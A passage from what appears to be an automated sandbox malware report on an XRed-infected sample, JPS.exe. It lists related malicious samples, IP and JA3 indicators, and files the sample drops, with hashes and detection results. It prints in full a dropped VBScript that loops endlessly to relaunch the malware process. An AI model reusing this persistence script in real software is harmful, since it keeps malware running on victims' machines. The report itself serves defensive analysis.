                                                                                                                                                      VOXILITYGB222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 104.250.189.221
                                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.111.138.100
                                                                                                                                                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                      • 104.243.246.120
                                                                                                                                                      nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 46.243.206.70
                                                                                                                                                      7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 37.221.166.158
                                                                                                                                                      AWKNET-LLCUS222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252
                                                                                                                                                      Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                                                                      • 69.42.215.252

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225
                                                                                                                                                      wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                      • 172.217.18.110
                                                                                                                                                      • 142.250.181.225

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):118
                                                                                                                                                      Entropy (8bit):3.5700810731231707
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                      MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_e73781c637c020daee3de6ae263d2d0a91f2a4c_455b7b6e_5a7823b5-e427-4c31-bee6-8232ff9cb76e\Report.wer

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):1.1340163050281056
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:9U2VpsoI40Kks/kDzJDzqjLeA/NcdsJzuiFYZ24IO8EKDzy:ZyoWKksMJqjsCzuiFYY4IO8zy
                                                                                                                                                      MD5:406DCE548A089C28208A14A79D05001B
                                                                                                                                                      SHA1:5353DDF49A9A3A13D309853980C57D3307DB2C39
                                                                                                                                                      SHA-256:C74AA013CDA8BC806339B20FEF19352594A9D398E1EB6A56A873015A18F19095
                                                                                                                                                      SHA-512:0BAB0BCAE73E0F47E7DB7ABCCBD6C19A514234B87722CBCC3D7B75C54120FB97689BB521FAB813795E564F58B5B91DF832CCB6B12D5D94D2176A88459AD43587
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.7.9.5.7.5.8.6.9.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.7.9.6.6.8.9.9.4.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.7.8.2.3.b.5.-.e.4.2.7.-.4.c.3.1.-.b.e.e.6.-.8.2.3.2.f.f.9.c.b.7.6.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.c.e.0.c.0.5.-.1.3.1.a.-.4.7.1.2.-.8.f.c.b.-.4.d.8.7.1.c.8.5.1.f.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.4.-.0.0.0.1.-.0.0.1.3.-.9.9.0.2.-.5.b.2.0.a.5.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.4.4.d.a.6.7.5.8.d.6.2.d.3.9.c.9.f.9.6.e.1.8.7.6.3.d.c.a.6.f.c.8.5.8.3.8.5.e.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5C.tmp.WERInternalMetadata.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6312
                                                                                                                                                      Entropy (8bit):3.723033551668718
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJjkxR6WDN5YirJkf60pD089bNusfyvPm:R6lXJ66WDN5YGJkyoNtfr
                                                                                                                                                      MD5:12719B6664DC6E284B86E5B21EB32F62
                                                                                                                                                      SHA1:67230E829F02DFEE539E23339C89394D6FA9E1F0
                                                                                                                                                      SHA-256:48202F43AE4FE6BE41874D8D728E7EBFA4DAC6A4DC8D98CF319CC75AFC1C116B
                                                                                                                                                      SHA-512:1A0EB38F5CB51F2A6E67FA73834BB796A4DD0C00138A2991DFC2A539B686116305ED7621B3A226419B4501C23B5F3D31C5F404EEB811CB935FD9E52EC8994031
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.0.4.<./.P.i.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8C.tmp.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4580
                                                                                                                                                      Entropy (8bit):4.45033318588171
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zs4zJg77aI925WpW8VYlYm8M4JFFFb+q8Z4KZdd:uIjfWI7gI7VJJVBKZdd
                                                                                                                                                      MD5:6460FFB5BD585B2152E0FB611D423177
                                                                                                                                                      SHA1:17AAFA726050F5D880C90F071CFB276F35A4BD8A
                                                                                                                                                      SHA-256:2EB7450E73DC7FFE44F6F1D157FEEA0DC3D8D917A015739C24AD20024DB6FAB6
                                                                                                                                                      SHA-512:819069E3CDAF1E6187EB19D6126803807CB812B7E9231BBBF53AC5CBA812DFCD082A8F1C8DDA7457C93AAC47BE4625938A292DD336061C50871A2B5178F4831E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653848" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE733.tmp.dmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 30 10:25:59 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3809284
                                                                                                                                                      Entropy (8bit):1.9728553692228321
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:4UKK3PKYtcmX3Md5jh0iELOjiOCYuLpB2pVFo1rbKS4Odjz8I3B9zo:4S/h05jhQL/trYPFoJl7Rz8Mjzo
                                                                                                                                                      MD5:036966C0C5F0C07C52E34E0452E92A96
                                                                                                                                                      SHA1:FA0CC98243A17168E47C13A9FD3486F58884F565
                                                                                                                                                      SHA-256:D7A610A1DEB34D84ACEA57417B588DB234D0C496709168797574C4EB82793DAE
                                                                                                                                                      SHA-512:EC97DDB2D84CC19AF3B9AAAFB4C7E95C8953BF66637D5D8D2BFD8584B23E9A9715F188F3BBC1750DCBEE00F284DB094F830A1851EF8AACDB51305A42226E6FD9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... .......7urg.............4...............;......$...p[..........n{..........`.......8...........T............B..$.8..........[...........]..............................................................................eJ.......^......GenuineIntel............T............urg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\Synaptics\RCX5246.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX5246.tmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX5246.tmp, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):26
                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2bGE2xI.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268492288302175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+05r7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+qr7+pAZewRDK4mW
                                                                                                                                                      MD5:0F4759D5D7DD5A3E18FEFB4A589E1D04
                                                                                                                                                      SHA1:A0B4EA8FD07FE324D209C882CDA2EE6409E13D1C
                                                                                                                                                      SHA-256:523032606C9F9B19162E1D0285B26830ECE4F50FAAC090867A5C04FDAEE97CA4
                                                                                                                                                      SHA-512:281E3E430DDF8923B53E8BD53A32575CB5D49DC17D03147A7174ED5F8E081959823E17D8AFF2B1F03C6A02ACE6885CD2F9D6D225C968E4C58A7A60D1E2705D5C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WcMdG3StN37JVoGzhP0aFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\9cqQLTp.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254645603465677
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0GXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+P+pAZewRDK4mW
                                                                                                                                                      MD5:E2F18FA30355020FB65D4C63C6980234
                                                                                                                                                      SHA1:06838007A887270C05DEA26FE437C5CA77EC6958
                                                                                                                                                      SHA-256:BF3C6A9BB2A2808B7249A8C0F8AD27F5A2488D492214F668304E5E396A564182
                                                                                                                                                      SHA-512:6618409A3B5C147871304EEE2D794204B83328191A10CDE7CBCBB57B34B02D2F36D242310459C39F693077233E2840D66A93FB405E18800D75A4E6B18A8E7835
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_owvgnCMHmz9wYsEcIy-zw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\B44I9ao.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257325372241308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hn3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K3+pAZewRDK4mW
                                                                                                                                                      MD5:D21F66769921324B59169EDF17D25820
                                                                                                                                                      SHA1:4283E3EEF5A470D4DA9304D07D9227D2ADCC5FAB
                                                                                                                                                      SHA-256:599F64A1D1FBF05E15E5F21F32052B9184DB236AEBE184E1BC5CE3AEAAA5361F
                                                                                                                                                      SHA-512:3C5EB801900C63BA7323F88DD28B28CAB17A427301A22AAB3C707D9D36037B0E0D19929CA6B1E4A67C37155FE1F7783F637A643B8935269DA2115266341A5213
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aCGz7WkWsupiQs4wxBcB7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\BQQQVU.vbs

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):831
                                                                                                                                                      Entropy (8bit):5.338177797250752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dF/UFJr/eU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFJbLt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                      MD5:43CF172F7E11D56D668B38F3A1E71A27
                                                                                                                                                      SHA1:E2E8F56F15480155E0A48BAAA20F00DB962BD7E5
                                                                                                                                                      SHA-256:DB500A62A20732754483F5F6D4AB0F45B58812BE1B6A40D6EB52367C947A7A2D
                                                                                                                                                      SHA-512:0717AAC5F99EF8C8004B9D0E1F36E6EA3EF07D4989D10C18581FE057B6935AC8F954A92EB9195673CC0A9E128A02A0D0C90F91DF5FFC2D964594A0A5EA488AB3
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_JPS.exe"..fileset = """C:\Users\user\Desktop\._cache_JPS.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\CDaU7kn.ini

                                                                                                                                                      Download File
